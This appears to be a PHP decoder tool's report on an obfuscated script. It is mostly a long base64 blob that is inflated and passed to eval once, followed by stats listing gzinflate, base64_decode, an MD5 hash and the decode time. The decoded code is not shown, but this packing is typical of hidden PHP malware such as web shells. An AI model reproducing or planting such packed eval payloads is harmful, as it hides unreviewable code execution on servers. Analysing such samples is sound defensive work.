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')));

?>

Function Calls

gzinflate 1
base64_decode 1

Variables

None

Stats

MD5 c0428dd0f75cc171b0ed9cf751da483e
Eval Count 1
Decode Time 114 ms